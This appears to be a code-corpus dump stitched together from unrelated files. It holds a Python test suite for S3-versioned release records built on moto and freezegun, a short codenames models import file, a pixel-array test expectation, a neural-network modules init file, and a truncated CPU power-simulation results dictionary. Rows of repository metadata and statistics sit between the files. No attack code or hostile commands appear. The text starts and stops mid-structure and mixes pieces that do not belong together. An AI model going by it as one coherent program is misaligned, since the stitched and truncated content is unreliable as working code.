{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
with freeze_time("2018-02-02T00:00:00"):
new = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
expected = release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=new["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
r = release._get_release(client, "test", "test-app", None)
compare(expected, r)
@mock_s3
def test_get_older_release():
"""
Gets an old release using its object Version ID.
"""
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
old = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
with freeze_time("2018-02-02T00:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
expected = release.Release(
version=1,
commit="0123456789abcdef",
changelog="some changes",
version_id=old["VersionId"],
image="sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
r = release._get_release(client, "test", "test-app", old["VersionId"])
compare(expected, r)
@mock_s3
def test_get_releases_no_releases_yet():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
rs = release.get_releases(client, "test-app", bucket="test")
compare([], list(rs))
@mock_s3
def test_get_all_releases():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
old = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
with freeze_time("2018-02-02T00:00:00"):
new = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
rs = release.get_releases(client, "test-app", bucket="test")
expected = [
release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=new["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
),
release.Release(
version=1,
commit="0123456789abcdef",
changelog="some changes",
version_id=old["VersionId"],
image="sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
timestamp=datetime(2018, 1, 1, 12, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
),
]
compare(expected, list(rs))
@mock_s3
def test_get_releases_skips_non_versioned_objects():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
with freeze_time("2018-01-01T12:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-02-02T00:00:00"):
new = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
rs = release.get_releases(client, "test-app", bucket="test")
expected = [
release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=new["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
]
compare(expected, list(rs))
@mock_s3
def test_get_releases_skips_objects_with_invalid_data():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
# missing fields
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
# invalid JSON
client.put_object(Bucket="test", Key="test-app", Body='{ "this": "is" invalid')
with freeze_time("2018-02-02T00:00:00"):
new = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
rs = release.get_releases(client, "test-app", bucket="test")
expected = [
release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=new["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
]
compare(expected, list(rs))
@mock_s3
def test_get_releases_since():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
with freeze_time("2018-02-02T00:00:00"):
second = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
with freeze_time("2018-03-03T00:00:00"):
third = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 3,
"commit": "zxcvbnm12345",
"changelog": "new awesome feature",
"image": "sha256:b0190de683bc5d190c4c09473e0d2a5696850f22244cd8e9fc925117580b6361",
"author": "author@example.com",
}
),
)
rs = release.get_releases(client, "test-app", since=2, bucket="test")
expected = [
release.Release(
version=3,
commit="zxcvbnm12345",
changelog="new awesome feature",
version_id=third["VersionId"],
image="sha256:b0190de683bc5d190c4c09473e0d2a5696850f22244cd8e9fc925117580b6361",
timestamp=datetime(2018, 3, 3, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
),
release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=second["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
),
]
compare(expected, list(rs))
@mock_s3
def test_get_release():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
with freeze_time("2018-02-02T00:00:00"):
second = client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 2,
"commit": "abcdef0123456789",
"changelog": "some other changes to fix version 1",
"image": "sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
"author": "author@example.com",
}
),
)
r = release.get_release(client, "test-app", 2, bucket="test")
expected = release.Release(
version=2,
commit="abcdef0123456789",
changelog="some other changes to fix version 1",
version_id=second["VersionId"],
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=datetime(2018, 2, 2, 0, 0, 0, tzinfo=pytz.utc),
author="author@example.com",
)
compare(expected, r)
@mock_s3
def test_get_release_not_found():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
with freeze_time("2018-01-01T12:00:00"):
client.put_object(
Bucket="test",
Key="test-app",
Body=json.dumps(
{
"version": 1,
"commit": "0123456789abcdef",
"changelog": "some changes",
"image": "sha256:eb1494dee949e52c20084672700c9961d7fc99d1be1c07b5492bc61c3b22a460",
"author": "author@example.com",
}
),
)
r = release.get_release(client, "test-app", 2, bucket="test")
compare(None, r)
@mock_s3
@freeze_time("2018-01-01T12:00:00")
def test_create_new_release():
s3 = boto3.resource("s3")
client = boto3.client("s3")
s3.create_bucket(Bucket="test")
bucket = s3.BucketVersioning("test")
bucket.enable()
new = release.Release(
version=1,
commit="abcdef0123456789",
changelog="some changes",
version_id=None,
image="sha256:000dd6d0c34dd4bb2ec51316ec41f723dd546ef79b30e551ec8390d032707351",
timestamp=None,
author="author@example.com",
)
pushed = release.put_release(client, "test", "test-app", new)
fetched = release.get_release(client, "test-app", 1, bucket="test")
compare(pushed, fetched)
| 30.525755 | 103 | 0.549052 | 1,538 | 17,186 | 6.049415 | 0.085176 | 0.040843 | 0.05718 | 0.066208 | 0.877365 | 0.868659 | 0.863822 | 0.853074 | 0.835447 | 0.826634 | 0 | 0.174098 | 0.329221 | 17,186 | 562 | 104 | 30.580071 | 0.632981 | 0.016409 | 0 | 0.753813 | 0 | 0 | 0.301988 | 0.119193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028322 | false | 0 | 0.021786 | 0 | 0.050109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8577fdc6c13168439cdd68d0ff8dcb0644d35ed6 | 126 | py | Python | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | 1 | 2020-11-29T11:33:54.000Z | 2020-11-29T11:33:54.000Z | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | null | null | null | api/app/games/codenames/models/__init__.py | naveen-u/lets-play | 0ea1631504fb663045d3f6f1fce7b2cff9eebe52 | [
"MIT"
] | null | null | null | from .codenames_players import *
from .codenames_teams import *
from .codenames_rooms import *
from .codenames_words import *
| 25.2 | 32 | 0.809524 | 16 | 126 | 6.125 | 0.4375 | 0.530612 | 0.581633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 33 | 31.5 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
859d0faf3e518eda30841d2bc73d1b26cb18928c | 356 | py | Python | tests/expectations/python-expr/apply-mask-image-exp1.py | nipeone/histolab | 78854423df04c95c7168d03a95ae8665e3e957d8 | [
"Apache-2.0"
] | 149 | 2020-06-23T17:56:04.000Z | 2022-03-26T05:51:08.000Z | tests/expectations/python-expr/apply-mask-image-exp1.py | nipeone/histolab | 78854423df04c95c7168d03a95ae8665e3e957d8 | [
"Apache-2.0"
] | 245 | 2020-06-22T22:56:06.000Z | 2022-03-28T03:18:11.000Z | tests/expectations/python-expr/apply-mask-image-exp1.py | MPBA/histolab | 1dffe88aa04022567c70bbb78f96a860d73a599b | [
"Apache-2.0"
] | 31 | 2020-06-23T17:56:36.000Z | 2022-02-07T07:41:26.000Z | [
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[73, 64, 74], [36, 44, 161], [135, 219, 69], [79, 139, 75], [148, 40, 155]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
[[84, 55, 130], [106, 123, 248], [117, 155, 214], [16, 121, 122], [154, 146, 26]],
]
| 44.5 | 86 | 0.342697 | 75 | 356 | 1.626667 | 0.4 | 0.704918 | 1.008197 | 1.278689 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0.368852 | 0 | 0.471042 | 0.272472 | 356 | 7 | 87 | 50.857143 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
85c040c05aa9470da3143a5e168b9f5d17c00caa | 157 | py | Python | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | 90 | 2018-07-26T06:41:23.000Z | 2021-11-08T10:40:51.000Z | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | null | null | null | lib/nn/modules/__init__.py | switchablenorms/SwitchNorm_Detection | ab6848667bc8976367fdacb4b8ebbaeefdc79bd6 | [
"MIT"
] | 16 | 2018-07-26T09:59:36.000Z | 2020-10-08T07:21:58.000Z | from .affine import AffineChannel2d
from .normalization import GroupNorm
from .normalization import SwitchNorm
from .upsample import BilinearInterpolation2d
| 31.4 | 45 | 0.872611 | 16 | 157 | 8.5625 | 0.5625 | 0.248175 | 0.335766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014184 | 0.101911 | 157 | 4 | 46 | 39.25 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a439618ed529308e0ed43b6a0258a9455cf6be7d | 68,607 | py | Python | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC/EightThreads_cactusADM/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.186019,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.348796,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.17754,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.417191,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.722423,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.41433,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.55394,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.231841,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.33573,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.222463,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0151235,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.171971,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.111847,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.394433,
'Execution Unit/Register Files/Runtime Dynamic': 0.126971,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.466514,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.21449,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.64957,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.0638e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.0638e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.5128e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.34522e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0016067,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0017231,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000399199,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.107522,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.264599,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.365193,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.739436,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0788638,
'L2/Runtime Dynamic': 0.0225165,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.7898,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.2144,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.14729,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.14729,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.48817,
'Load Store Unit/Runtime Dynamic': 3.08808,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.363192,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.726385,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
